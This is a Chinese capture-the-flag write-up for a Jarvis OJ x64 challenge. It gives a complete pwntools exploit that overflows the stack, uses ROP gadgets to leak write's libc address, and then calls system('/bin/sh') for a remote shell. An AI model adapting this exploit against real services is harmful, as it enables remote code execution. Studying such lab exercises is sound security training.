與level2_x64類似,也是x64位的一個程序,但是程序之中并沒有直接調用system函數,也沒有bin/sh參數,只提供了一個libc庫,所以是要讓我們通過libc庫泄露system函數的地址和binsh的地址,這里要注意的是依舊是寄存器的問題,所以我們要構建gadget,rop繞過,通過泄漏出system函數的地址,然后在bss段中寫入binsh參數,調用system函數從而getshell
from pwn import *
from time import *
p = remote('pwn2.jarvisoj.com',9883)
write_plt = 0x04004B0
write_got = 0x0600A58
poprdiret = 0x04006b3
start = 0x04004F0
poprsiret = 0x04006b1
write_libc_address = 0x00000000000eb700 #readelf -a ./libc-2.19.so | grep " write@"
bin_sh_libc_address = 0x17c8c3 #strings -a -t x libc-2.19.so | grep "/bin/sh"
system_libc_address = 0x0000000000046590 #readelf -a ./libc-2.19.so | grep " system@"
exit_libc_address = 0x000000000003c1e0 #readelf -a ./libc-2.19.so | grep " exit@"
payload1 = '\x00'*(0x80+8) + p64(poprdiret) + p64(1)+ p64(poprsiret)+p64(write_got) + p64(1) + p64(write_plt) +p64(start)
p.recvuntil("Input:\n")
p.sendline(payload1)
leak = u64(p.recv(8))
libc_base = leak - write_libc_address
system = libc_base + system_libc_address
binsh = libc_base + bin_sh_libc_address
exit = libc_base + exit_libc_address
payload = 'a'*(0x80+8) + p64(poprdiret) + p64(binsh) + p64(system) +p64(exit)
p.sendline(payload)
p.interactive()
